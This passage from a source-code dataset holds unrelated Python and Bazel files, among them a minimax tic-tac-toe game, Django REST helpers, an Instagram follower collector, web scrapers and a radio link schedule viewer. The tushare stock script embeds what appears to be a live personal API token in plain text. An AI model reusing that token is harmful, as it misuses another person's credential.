f.write(\"\\n\")\n\n\n","sub_path":"CodeForces/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"492465746","text":"import numpy as np\nimport math\nimport os\n\nai, human = 'X', 'O'\n\ndef clear():\n os.system('cls')\n\ndef check_winner(board):\n rows, cols = np.shape(board)\n cond_1 = np.hsplit(board, 3)\n cond_2 = np.vsplit(board, 3)\n\n board_flip = np.fliplr(board)\n x_case = np.where(board.diagonal() == 'X', True, False)\n x_case_f = np.where(board_flip.diagonal() == 'X', True, False)\n o_case = np.where(board.diagonal() == 'O', True, False)\n o_case_f = np.where(board_flip.diagonal() == 'O', True, False)\n\n if x_case.all() or x_case_f.all():\n return 'X'\n elif o_case.all() or o_case_f.all():\n return 'O'\n\n for elem in cond_1:\n caseX = np.where(elem == 'X', True, False)\n caseO = np.where(elem == 'O', True, False)\n if caseX.all():\n return 'X'\n elif caseO.all():\n return 'O'\n for elem in cond_2:\n caseX = np.where(elem == 'X', True, False)\n caseO = np.where(elem == 'O', True, False)\n if caseX.all():\n return 'X'\n elif caseO.all():\n return 'O'\n\n if np.where(board != '', True, False).all():\n return 'tie'\n\ndef best_move(board):\n pos = np.argwhere(board.__eq__('') == True)\n move = []\n best_score = -math.inf\n for values in pos:\n x, y = values\n 
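        # minimax probe: tentatively place the AI mark, score the opponent's best reply
        # with min_value, then undo the move before trying the next empty cell.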
board[x, y] = ai\n        score = min_value(board, 0)\n        board[x, y] = ''\n        if score > best_score:\n            best_score = score\n            move = [x, y]\n\n    board[move[0], move[1]] = ai\n    print_board(board)\n    make_move(board)\n\n\ndef min_value(board, depth):\n\n    if check_winner(board) == human:\n        return -10\n    elif check_winner(board) == ai:\n        return 10\n    elif check_winner(board) == 'tie':\n        return 0\n    pos = np.argwhere(board.__eq__('') == True)\n\n    best_score = math.inf\n    for values in pos:\n        x, y = values\n        board[x, y] = human\n        score = max_value(board, depth+1)\n        board[x, y] = ''\n        best_score = min(score, best_score)\n    return best_score\n\ndef max_value(board, depth):\n    if check_winner(board) == human:\n        return -10\n    elif check_winner(board) == ai:\n        return 10\n    elif check_winner(board) == 'tie':\n        return 0\n\n    pos = np.argwhere(board.__eq__('') == True)\n    best_score = -math.inf\n    for values in pos:\n        x, y = values\n        board[x, y] = ai\n        score = min_value(board, depth+1)\n        board[x, y] = ''\n        best_score = max(best_score, score)\n\n    return best_score\n\ndef make_move(board):\n    current_move = human\n    if check_winner(board) == ai:\n        print(\"AI won the game\")\n    elif check_winner(board) == 'tie':\n        print('It is a tie')\n    elif current_move == human:\n        try:\n            x = int(input(\"Please enter X co-ordinate: \"))\n            y = int(input(\"Please enter Y co-ordinate: \"))\n            if board[x, y] == '':\n                board[x, y] = human\n                if check_winner(board) == human:\n                    print(\"Congratulations you won the game\")\n                elif check_winner(board) == 'tie':\n                    print_board(board)\n                    print(\"It's a tie\")\n                else:\n                    best_move(board)\n            else:\n                print(\"Position is already occupied, Please enter new pos:\")\n                make_move(board)\n        except (ValueError, IndexError):\n            print(\"Invalid Position. Please enter again:\")\n            make_move(board)\n\ndef print_board(board):\n    clear()\n    for index, elems in enumerate(board):\n        for idx, val in enumerate(elems):\n            if idx != 2:\n                print('', val, ' | ', end='')\n            else:\n                print(val)\n        if index != 2:\n            print('-------------')\n\n\nif __name__ == '__main__':\n    board = np.full((3, 3), '', dtype=str)\n    print_board(board)\n    make_move(board)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"258337749","text":"from flask_sqlalchemy import SQLAlchemy\nfrom app import db\n\n\nclass Review(db.Model):\n    id = db.Column(db.Integer,primary_key=True)\n    text = db.Column(db.String(400))\n    item_id=db.Column(db.Integer)\n    user=db.Column(db.String(40))\n    def __init__(self,text,item_id,username):\n        self.text = text\n        self.item_id=item_id\n        self.user=username\n    def revSerialize(self):\n        return { \"item_id\":self.item_id,\"Review\": self.text,\"user\": self.user }\n","sub_path":"app/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"2752322","text":"# -*- encoding:utf-8 -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 9\n_modified_time = 1386266502.119802\n_enable_loop = True\n_template_filename = u'/Users/xochilpili/Documents/Develop/python/pylons/DanieleChallenge/danielechallenge/templates/base/base.html'\n_template_uri = u'/base/base.html'\n_source_encoding = 'utf-8'\nfrom markupsafe import escape\n_exports = []\n\n\ndef render_body(context,**pageargs):\n    __M_caller = context.caller_stack._push_frame()\n    try:\n        
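        # Mako-generated preamble: capture the template locals, then fetch `next`
        # (the inheriting template) from the render context.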
__M_locals = __M_dict_builtin(pageargs=pageargs)\n next = context.get('next', UNDEFINED)\n __M_writer = context.writer()\n # SOURCE LINE 1\n __M_writer(u'\\n\\nFormDemo\\n\\n\\n')\n # SOURCE LINE 6\n __M_writer(escape(next.body()))\n __M_writer(u'\\n\\n\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n","sub_path":"data/templates/base/base.html.py","file_name":"base.html.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"254825597","text":"import os\nimport re\n\n__author__ = 'Dean Gardiner'\n\n\ndef get_text(filename):\n if not os.path.exists(filename):\n return \"\"\n _file = open(filename)\n data = _file.read()\n _file.close()\n return data\n\n\ndef parse_data(data):\n items = []\n li = 0\n for line in data.splitlines():\n li += 1\n line = line.decode('utf-8')\n\n tvdb_id, sep, aliases = line.partition(':')\n\n alias_list = [re.sub(r'\\\\(.)', r'\\1', x) for x in re.findall(r\"'(.*?)(?//:toolchain\"\n - A compiler target: \"@//:compiler\"\n - A platform: \"@//:platform\"\n - An execution platform: \"@//:execution_platform\"\n - A config setting: \"@//:target\"\n\"\"\"\n\ndef toolchain_maker(name, implementation, definition):\n if implementation == \"linux_gcc\":\n updated_definition = toolchain_merge({\n \"compile_dev_flags\": COPTS_GCC_DEV,\n \"compile_prod_flags\": COPTS_GCC_PROD,\n \"compile_flags\": COPTS_GCC,\n \"link_flags\": LINKOPTS_GCC,\n \"coverage_compile_flags\": COPTS_GCC_COVERAGE,\n \"coverage_link_flags\": LINKOPTS_GCC_COVERAGE,\n \"template_bin_cc\": \"//tools/bazel_build/toolchains/cc:template/bin/wrapper_cc_start_end_group\",\n }, definition)\n\n _toolchain_maker_linux(\n name = name,\n **updated_definition\n )\n\n elif implementation == \"linux_clang\":\n updated_definition = toolchain_merge({\n \"compile_dev_flags\": COPTS_CLANG_DEV,\n \"compile_prod_flags\": COPTS_CLANG_PROD,\n \"compile_flags\": COPTS_CLANG,\n \"link_flags\": LINKOPTS_CLANG,\n \"coverage_compile_flags\": COPTS_CLANG_COVERAGE,\n \"coverage_link_flags\": LINKOPTS_CLANG_COVERAGE,\n }, definition)\n\n _toolchain_maker_linux(\n name = name,\n **updated_definition\n )\n\n else:\n fail(\"Unsupported toolchain type '{}'\".format(implementation))\n\n native.register_toolchains(\n \"@{}//:toolchain\".format(name),\n \"@{}//:binary_toolchain\".format(name),\n )\n\ndef toolchain_merge(data1, data2):\n \"\"\"Merge 2 toolchain data entries.\"\"\"\n\n # Make a copy of data1 so that it can be mutated\n result = {}\n result.update(data1)\n\n # Populate the data2 items\n for key2, value2 in data2.items():\n if key2 in data1:\n if type(data1[key2]) != type(value2):\n fail(\"Trying to merge conflicting types for key '{}'.\".format(key2))\n if type(value2) == \"list\":\n result[key2] = data1[key2] + value2\n elif data1[key2] != value2:\n fail(\"Trying to merge different values for key '{}'.\".format(key2))\n else:\n result[key2] = value2\n\n return result\n","sub_path":"tools/bazel_build/toolchains/cc/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":10757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"213952760","text":"# Import all the necessary libraries\n\nimport os\nimport sys\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import Request, urlopen\n\n# Unter dem folgenden Link (base) finden sich alle Gedichte von Friedrich Schiller auf gutenberg.spiegel.de\n# die einzelnen Ausgaben werden dahinter einfach 
hochgezählt (max 154)\n# with the following script the poems can be downloaded and saved into a text file.\n# \n\n\nbase = 'http://gutenberg.spiegel.de/buch/gedichte-9097/'\n\nfor n in range(41, 156):\n    print(n)\n    url = base + str(n)\n    req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n    url = urlopen(req)\n    content = url.read()\n    soup = BeautifulSoup(content, 'lxml')\n    \n    text = ''\n    \n    div = soup.findAll(\"div\",{\"id\" : \"gutenb\"})\n    for tag in div:\n        t = tag.get_text()\n        text += t\n\n    tempfile = 'temp.txt'\n    \n    with open(tempfile, 'w') as temp:\n        temp.write(text)\n\n    # open the textfile\n    with open(tempfile, 'r') as f:\n        text_lines = f.readlines()\n    \n    # get the title of the poem\n    title = text_lines[1]\n    \n    # this is necessary so that the newline character does not\n    # appear in the title.\n    title = title[:-2]\n    print(title)\n    #write the poem into its own textfile\n    with open('./input/txt/to_process/' + str(title) + '.txt', 'w') as pfile:\n        pfile.write(text)\n    \n\n    ## Try to delete the temp file ##\n    try:\n        os.remove(tempfile)\n    except OSError as e:  ## if failed, report it back to the user ##\n        print (\"Error: %s - %s.\" % (e.filename, e.strerror))\n    \n    \n\n","sub_path":"helper/gutenberg_down.py","file_name":"gutenberg_down.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"402911518","text":"import base64\nimport datetime\nimport decimal\nimport os\nimport random\nimport string\nimport uuid\n\nfrom django.conf import settings\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.files.base import ContentFile\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils import timezone, six\nfrom django.utils.dateparse import parse_datetime\nfrom django.utils.timezone import is_aware, make_aware\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import DjangoModelPermissions\nfrom django_filters.filters import EMPTY_VALUES, OrderingFilter\nfrom rest_framework import status, serializers\nfrom rest_framework.pagination import PageNumberPagination, _positive_int\n\n\nfrom django.contrib.auth.mixins import PermissionRequiredMixin as \\\n    DjangoPermissionRequiredMixin\n\n\nclass PermissionRequiredMixin(DjangoPermissionRequiredMixin):\n\n    def get_permission_required(self):\n        perms = self.permission_required or ()\n        if isinstance(perms, dict):\n            perms = perms.get(self.request.method.lower(), ()) or ()\n\n        if isinstance(perms, six.string_types):\n            perms = (perms, )\n\n        return perms\n\n    def handle_no_authenticated(self):\n        if self.request.is_ajax():\n            return JsonResponse({'error': 'Not Authorized'}, status=401)\n        return redirect_to_login(self.request.get_full_path(),\n                                 self.get_login_url(),\n                                 self.get_redirect_field_name())\n\n    def handle_no_permission(self):\n        if self.request.is_ajax():\n            return JsonResponse({'error': 'Permission Denied'}, status=403)\n        if self.raise_exception:\n            raise PermissionDenied(self.get_permission_denied_message())\n        return render(self.request, \"no-permission.html\", status=403)\n\n    def dispatch(self, request, *args, **kwargs):\n        if not request.user.is_authenticated:\n            return self.handle_no_authenticated()\n        if not self.has_permission():\n            return self.handle_no_permission()\n        return super(PermissionRequiredMixin, self\n                     
).dispatch(request, *args, **kwargs)\n\n\ndef to_dict(obj, fields=None, fields_map=None, extra_fields=None):\n \"\"\"\n convert a model object to a python dict.\n @param fields: list of fields which we want to show in return value.\n if fields=None, we show all fields of model object\n @type fields: list\n @param fields_map: a map converter to show fields as a favorite.\n every field can bind to a lambda function in fields_map.\n if a field was bind to a None value in fields_map, we ignore this field\n to show in result\n @type fields_map: dict\n \"\"\"\n data = {}\n fields_map = fields_map or {}\n\n if fields is None:\n fields = [f.name for f in obj.__class__._meta.fields]\n fields.extend(extra_fields or [])\n for field in fields:\n if field in fields_map:\n if fields_map[field] is None:\n continue\n v = fields_map.get(field)()\n else:\n v = getattr(obj, field, None)\n if isinstance(v, datetime.datetime):\n data[field] = v.isoformat() + 'Z'\n elif isinstance(v, datetime.date):\n data[field] = v.isoformat()\n elif isinstance(v, decimal.Decimal):\n data[field] = float(v)\n else:\n data[field] = v\n\n return data\n\n\nclass CustomPagination(PageNumberPagination):\n \"\"\" Custom Pagination to be used in rest api\"\"\"\n\n BIG_PAGE_SIZE = 10000000\n page_size_query_param = 'page_size'\n\n def paginate_queryset(self, queryset, request, view=None):\n if view:\n max_page_size = getattr(view, 'max_page_size', self.max_page_size)\n if max_page_size is None:\n from django.conf import settings\n max_page_size = settings.REST_FRAMEWORK.get('MAX_PAGE_SIZE_DEFAULT', 100)\n self.max_page_size = self.BIG_PAGE_SIZE if max_page_size == 0 else max_page_size\n return super(CustomPagination, self).paginate_queryset(queryset, request, view=view)\n\n def get_page_size(self, request):\n \"\"\"\n this is overrided to allow 0 as a page_size.\n if page_size=0, we will set page_size as max_page_size.\n \"\"\"\n page_size = self.page_size\n if self.page_size_query_param:\n try:\n page_size = _positive_int(\n request.query_params[self.page_size_query_param],\n strict=False,\n cutoff=self.max_page_size\n )\n except (KeyError, ValueError):\n pass\n if page_size == 0:\n page_size = self.max_page_size\n return page_size\n\n def get_paginated_response(self, data):\n \"\"\" override pagination structure in list rest api \"\"\"\n\n next_page = self.page.next_page_number() if \\\n self.page.has_next() else None\n previous_page = self.page.previous_page_number() if \\\n self.page.has_previous() else None\n return Response({\n 'pagination': {\n 'next_url': self.get_next_link(),\n 'previous_url': self.get_previous_link(),\n 'current_page': self.page.number,\n 'next_page': next_page,\n 'previous_page': previous_page,\n 'first_page': 1,\n 'last_page': self.page.paginator.num_pages,\n 'page_size': self.get_page_size(self.request),\n 'count': self.page.paginator.count,\n },\n 'results': data\n })\n\n\ndef custom_rest_exception_handler(exc, context):\n \"\"\" Custom rest api exception handler \"\"\"\n from rest_framework import exceptions\n from rest_framework.compat import set_rollback\n from rest_framework.views import exception_handler\n response = exception_handler(exc, context)\n if isinstance(exc, IntegrityError) and ('already exists' in str(exc) or 'must make a unique set' in str(exc)):\n data = {'detail': 'duplicate unique key'}\n set_rollback()\n return Response(data, status=status.HTTP_409_CONFLICT)\n if isinstance(exc, exceptions.NotAuthenticated):\n response.status_code = status.HTTP_401_UNAUTHORIZED\n if isinstance(exc, 
exceptions.ValidationError) and (\n 'already exists' in str(exc) or 'must make a unique set' in str(exc)):\n response.status_code = status.HTTP_409_CONFLICT\n\n return response\n\n\nclass DynamicFieldsSerializerMixin(object):\n \"\"\"\n This class allow you to have dynamic fields in get rest api.\n user can pass \"fields\" and \"xfields\" as a get query parameter.\n \"fields\" specify list of fields you want to be shown as a result.\n \"xfields\" specify list of fields you want to be excluded in result.\n i.e:\n fields=id,name\n or\n xfields=name1,name2\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(DynamicFieldsSerializerMixin, self).__init__(*args, **kwargs)\n if not self.context:\n return\n\n params = self.context['request'].query_params\n fields = params.get('fields')\n xfields = params.get('xfields')\n if fields:\n fields = fields.split(',')\n allowed = set(fields)\n existing = set(self.fields.keys())\n for field_name in existing - allowed:\n self.fields.pop(field_name)\n elif xfields:\n xfields = xfields.split(',')\n for field_name in xfields:\n self.fields.pop(field_name, None)\n\n\nclass ExtendedOrderingFilter(OrderingFilter):\n def __init__(self, *args, **kwargs):\n self.ordering_map = kwargs.pop('ordering_map', {})\n super(ExtendedOrderingFilter, self).__init__(*args, **kwargs)\n\n def get_ordering_value(self, param):\n descending = param.startswith('-')\n param = param[1:] if descending else param\n field_name = self.param_map.get(param, param)\n field_name = self.ordering_map.get(field_name, field_name)\n if isinstance(field_name, str):\n field_name = (field_name,)\n\n return [(\"-%s\" % f if descending else f) for f in field_name ]\n\n def filter(self, qs, value):\n if value in EMPTY_VALUES:\n return qs\n\n ordering = []\n for param in value:\n ordering.extend(list(self.get_ordering_value(param)))\n return qs.order_by(*ordering)\n\n\nclass CustomDjangoModelPermissions(DjangoModelPermissions):\n perms_map = {\n 'OPTIONS': [],\n 'HEAD': [],\n 'GET': ['%(app_label)s.view_%(model_name)s'],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s'],\n }\n\n\ndef random_id(n=8, no_upper=False, no_lower=False, no_digit=False):\n rand = random.SystemRandom()\n chars = ''\n if no_upper is False:\n chars += string.ascii_uppercase\n if no_lower is False:\n chars += string.ascii_lowercase\n if no_digit is False:\n chars += string.digits\n if not chars:\n raise Exception('chars is empty! change function args!')\n return ''.join([rand.choice(chars) for _ in range(n)])\n\n\ndef get_random_upload_path(upload_dir, filename, include_date=False):\n ext = filename.split('.')[-1]\n randid = random_id(n=8)\n filename = \"{0}-{1}.{2}\".format(uuid.uuid4(), randid, ext)\n if include_date:\n filename = '{}-{}'.format(timezone.now().strftime('%Y%m%d%H%M%S'), filename)\n return os.path.join(upload_dir, filename)\n\n\nclass Base64ImageField(serializers.ImageField):\n def to_internal_value(self, data):\n data = data.read().decode()\n if data.startswith('data:image'):\n format, imgstr = data.split(';base64,') # format ~= data:image/X,\n ext = format.split('/')[-1] # guess file extension\n id = uuid.uuid4()\n data = ContentFile(base64.b64decode(imgstr), name = id.urn[9:] + '.' 
+ ext)\n        return super(Base64ImageField, self).to_internal_value(data)\n\n\ndef get_aware_datetime(date_str):\n    ret = parse_datetime(date_str)\n    if not is_aware(ret):\n        ret = make_aware(ret)\n    return ret\n\n\ndef ex_reverse(viewname, **kwargs):\n    if viewname.startswith('http://') or viewname.startswith('https://'):\n        return viewname\n\n    host = kwargs.pop('hostname', None)\n    request = kwargs.pop('request', None)\n    scheme = kwargs.pop('scheme', None)\n    if not host:\n        host = request.get_host() if request else settings.HOSTNAME\n\n    if not viewname:\n        rel_path = ''\n    elif viewname.startswith('/'):\n        rel_path = viewname\n    else:\n        rel_path = reverse(viewname, **kwargs)\n\n    scheme = '{}://'.format(scheme) if scheme else ''\n\n    return '{0}{1}{2}'.format(scheme, host, rel_path)\n","sub_path":"project/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"125635453","text":"from InstagramAPI import InstagramAPI\nimport sys\nsys.path.insert(0, '/home/pi/develop/instabot.py/instabot_py/models')\nfrom followers_model import FollowersModel\nimport constantRaspbian\n\ndef getTotalFollowers(api, user_id):\n    followers = []\n    next_max_id = True\n    while next_max_id:\n        # first iteration hack\n        if next_max_id is True:\n            next_max_id = ''\n\n        _ = api.getUserFollowers(user_id, maxid=next_max_id)\n        followers.extend(api.LastJson.get('users', []))\n        next_max_id = api.LastJson.get('next_max_id', '')\n    return followers\n\nfollowers_model = FollowersModel()\nInstagramAPI = InstagramAPI(constantRaspbian.LOGIN, constantRaspbian.PASS)\nInstagramAPI.login()\nuser_id = InstagramAPI.username_id\nfollowers = getTotalFollowers(InstagramAPI, user_id)\nfollowers_model.setAllInactive()\nnew = 0\nfor item in followers:\n    new += followers_model.save(item['pk'], item['username'])\nprint (\"New followers: {}\".format(new))\n","sub_path":"instabot_py/api/followers.py","file_name":"followers.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"83583563","text":"import tushare as ts\nimport pandas as pd\n\nts.set_token('87109caa5d7d9197ce7c5d2cd687bf6d8f1fef7f98042675c147012b')  # the new version of tushare requires a personal token\npro = ts.pro_api()\n\n# \n\n# fetch basic stock info: TS code, stock code, stock name, industry, ...\n# no permission to fetch concept data\n# %%\nstock_basic = pro.stock_basic(list_status='L', fields='ts_code, symbol, name, industry,market')\n# rename the columns to make the later import into neo4j easier\nbasic_rename = {'ts_code': 'TS代码', 'symbol': '股票代码', 'name': '股票名称', 'industry': '行业','market':'市场类型'}\nstock_basic.rename(columns=basic_rename, inplace=True)\n\n# save as stock_basic.csv\nstock_basic.to_csv('test\\\\stock_basic.csv', encoding='gbk')\nstock_basic.head()\n# %%\n\n# fetch the legal-representative and city info of listed companies; tushare currently lacks permission for age info etc.\n# %%\nexecutive = pro.stock_company(exchange='', fields='ts_code,chairman,manager,secretary,city')\nexecutive_rename = {'ts_code':'TS代码','chairman':'法人代表','manager':'总经理','secretary':'董秘','city':'城市'}\nexecutive.rename(columns = executive_rename,inplace=True)\n\n# save as executive.csv\nexecutive.to_csv('test\\\\executive.csv', encoding='gbk')\nexecutive.head()\n# %%\n\n# for i in executive.values:\n#     print(i[0])","sub_path":"CodeHub/kg-0.2/Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"485008444","text":"# ------------------------------------------------------------------------------\n# 
------------------------------------------------------------------------------\n# --- TxOp Schedule Viewer for Link Manager Algorithm Evaluator ---\n# --- ---\n# --- Last Updated: September 3, 2019 ---\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\nimport sys\nimport os\nimport argparse\nfrom lxml import etree\nimport json\nimport math\nimport operator\nimport curses\nimport copy\nimport time\nfrom curses import wrapper\n\nns = {\"xsd\": \"http://www.w3.org/2001/XMLSchema\",\n \"mdl\": \"http://www.wsmr.army.mil/RCC/schemas/MDL\",\n \"tmatsP\": \"http://www.wsmr.army.mil/RCC/schemas/TMATS/TmatsPGroup\",\n \"tmatsD\": \"http://www.wsmr.army.mil/RCC/schemas/TMATS/TmatsDGroup\"}\n\n\n# shortcut dictionary for passing common arguments\nn = {\"namespaces\": ns}\n\nMAX_BW_MBPS = 10.0 # Max data rate (Mbps)\ndebug = 0 # Debug value: initially 0, e.g. no debug\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass RanConfig:\n \"\"\"Class to contain RAN Configuration info\"\"\"\n \n def __init__(self, name, id_attr, freq=0, epoch_ms=0, guard_ms=0.0):\n self.name = name\n self.id = id_attr\n self.freq = freq\n self.epoch_ms = epoch_ms\n self.guard_ms = guard_ms\n self.links = []\n self.efficiency_pct = 0\n self.gb_violated = False\n\n def add_link(self, link):\n self.links.append(link)\n \n def check_guardbands(self):\n txop_list = []\n for l in self.links:\n for t in l.tx_sched:\n start_stop = {'start': int(t.start_usec), 'stop': int(t.stop_usec)}\n txop_list.append(start_stop)\n txop_list.sort(key=operator.itemgetter('start'))\n for i in range(len(txop_list) - 1):\n if int(txop_list[i+1]['start']) < (int(txop_list[i]['stop']) + 1 + (self.guard_ms * 1000)):\n self.gb_violated = True\n if debug >= 2:\n print(\"GUARDBAND VIOLATION DETECTED!!! 
{} {}\\r\".format(txop_list[i], txop_list[i+1]))\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass QoSPolicy:\n \"\"\"Class to contain QoSPolicy info\"\"\"\n \n def __init__(self, name, id_attr, lmmc=0, ac=0, lmax=1000000):\n self.name = name\n self.id = id_attr\n self.lmmc = lmmc\n self.ac = ac\n self.max_latency_usec = lmax\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass TxOp:\n \"\"\"Class to contain TxOp info\"\"\"\n \n def __init__(self, freq=0, start_usec=0, stop_usec=0, timeout=0):\n self.freq = freq\n self.start_usec = int(start_usec)\n self.stop_usec = int(stop_usec)\n self.timeout = timeout\n self.duration_usec = int(stop_usec) - int(start_usec) + 1\n\n# # ------------------------------------------------------------------------------\n# # ------------------------------------------------------------------------------\n# class Scoring_Data\n# def __init__(self):\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\nclass RadioLink:\n \"\"\"Class to contain Radio Link info\"\"\"\n \n # def __init__(self, name, id_attr, src, src_id, dst, dst_id, qp=None, lat=0):\n def __init__(self, name, id_attr, src, src_id, src_group, dst, dst_id, qp=None, lat=0):\n self.name = name\n self.id = id_attr\n self.src = src\n self.src_id = src_id\n self.src_group = src_group\n self.dst = dst\n self.dst_id = dst_id\n self.tx_sched = []\n self.qos_policy = qp\n self.max_latency_usec = lat # Maximum Possible Latency achievable\n self.tx_dur_per_epoch_usec = 0\n self.alloc_bw_mbps = 0\n self.latency_point_value = 0\n self.throughput_point_value = 0\n self.greedy_tx_dur_per_epoch_usec = 0\n self.greedy_alloc_bw_mbps = 0\n self.greedy_throughput_point_value = 0\n\n def add_txop(self, txop):\n self.tx_sched.append(txop)\n self.tx_dur_per_epoch_usec += txop.duration_usec\n\n def calc_max_latency(self, epoch_usec):\n # initialize max_latency_usec with wrap-around TxOps\n if len(self.tx_sched) > 0:\n self.max_latency_usec = (int(epoch_usec) - (int(self.tx_sched[-1].stop_usec) + 1)) + \\\n int(self.tx_sched[0].start_usec)\n else:\n self.max_latency_usec = 0\n \n # iterate through the Link's TxOp Schedule, and compare latencies between TxOps with the previous max latency\n for i in range(len(self.tx_sched) - 1):\n temp_latency = int(self.tx_sched[i+1].start_usec) - (int(self.tx_sched[i].stop_usec) + 1)\n if temp_latency > self.max_latency_usec:\n self.max_latency_usec = temp_latency\n\n def calc_alloc_bw_mbps(self, epoch_ms):\n self.alloc_bw_mbps = ((int(self.tx_dur_per_epoch_usec) * (1000 / int(epoch_ms))) / 1000000) * MAX_BW_MBPS\n\n def calc_latency_value(self, max_points_thd_ms, min_points_thd_ms, multiplier):\n if self.max_latency_usec < int(max_points_thd_ms*1000):\n self.latency_point_value = 100\n elif self.max_latency_usec < int(min_points_thd_ms*1000):\n ans = 100 - (self.max_latency_usec - int(max_points_thd_ms*1000)) ** 2\n if ans > 0:\n self.latency_point_value = ans\n else:\n self.latency_point_value = 0\n else:\n self.latency_point_value = 0\n self.latency_point_value = self.latency_point_value * multiplier\n\n def calc_throughput_value(self, min_points_thd, max_points_thd, coef, multiplier):\n alloc_bw_kbps = self.alloc_bw_mbps 
* 1000\n if alloc_bw_kbps < min_points_thd:\n self.throughput_point_value = 0.0\n elif alloc_bw_kbps < max_points_thd:\n self.throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * alloc_bw_kbps)))\n else:\n self.throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * max_points_thd)))\n self.throughput_point_value = self.throughput_point_value * multiplier\n\n def calc_greedy_alloc_bw_mbps(self, epoch_ms):\n self.greedy_alloc_bw_mbps = ((int(self.greedy_tx_dur_per_epoch_usec) * (1000 / int(epoch_ms))) / 1000000) * MAX_BW_MBPS\n\n def calc_greedy_throughput_value(self, min_points_thd, max_points_thd, coef, multiplier):\n alloc_bw_kbps = self.greedy_alloc_bw_mbps * 1000\n if alloc_bw_kbps < min_points_thd:\n self.greedy_throughput_point_value = 0.0\n elif alloc_bw_kbps < max_points_thd:\n self.greedy_throughput_point_value = (100 - 100 * (math.e ** ((-1 * coef) * alloc_bw_kbps)))\n else:\n self.greedy_throughput_point_value = 100 - (100 * (math.e ** ((-1 * coef) * max_points_thd)))\n self.greedy_throughput_point_value = self.greedy_throughput_point_value * multiplier\n\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\nclass TmNSRadio:\n \"\"\"Class to contain TmNSRadio\"\"\"\n def __init__(self, id, name, rfmacaddress, listeningport, incoming_group_id):\n self.id = id\n self.name = name\n self.incoming = listeningport\n self.outgoing = rfmacaddress\n self.incoming_group_id = incoming_group_id\n\n# ------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------\n\n\ndef print_banner():\n global stdscr\n global banner_pad\n global text_d\n global border_d\n\n height, width = stdscr.getmaxyx()\n pad_height, pad_width = banner_pad.getmaxyx()\n\n horizon = border_d['TS'] * (pad_width - 2)\n banner_pad.addstr(0, 0, \"{0}{1}{2}\".format(border_d['TL'], horizon, border_d['TR']), text_d['BORDER'])\n banner_pad.addstr(1, 0, \"{0}{1}{2}\".format(border_d['LS'],\n \" TxOp Schedule Viewer for Link Manager \"\n \"Algorithm Evaluator \",\n border_d['RS']), text_d['BORDER'])\n banner_pad.addstr(2, 0, \"{0}{1}{2}\".format(border_d['BL'], horizon, border_d['BR']), text_d['BORDER'])\n banner_pad.noutrefresh(0, 0, 0, 0, 3, width - 1)\n \n \n# ------------------------------------------------------------------------------\n\n\ndef print_file_info(f, name, config, s_file):\n global stdscr\n global file_info_pad\n global text_d\n\n height, width = stdscr.getmaxyx()\n \n msg1 = \"MDL File: {}\".format(f)\n msg2 = \"Name: {}\".format(name)\n msg3 = \"Configuration Version: {}\".format(config)\n msg4 = \"Score Criteria: {}\".format(s_file)\n file_info_pad.addstr(0, 0, \"{0:^102}\".format(msg1), text_d['BG'] | BOLD)\n file_info_pad.addstr(1, 0, \"{0:^102}\".format(msg2), text_d['BG'] | BOLD)\n file_info_pad.addstr(2, 0, \"{0:^102}\".format(msg3), text_d['BG'] | BOLD)\n if s_file is None:\n file_info_pad.addstr(3, 0, \"{0:>102}\".format('Not for score'),\n text_d['ERROR_BLACK'] | BOLD | curses.A_UNDERLINE)\n elif os.path.isfile(s_file):\n file_info_pad.addstr(3, 0, \"{0:>102}\".format(msg4), text_d['FOR_SCORE'] | BOLD | curses.A_UNDERLINE)\n else:\n file_info_pad.addstr(3, 0, \"{0:>102}\".format('Score File Not Found: {0}'.format(s_file)),\n text_d['ERROR_BLACK'] | BOLD | 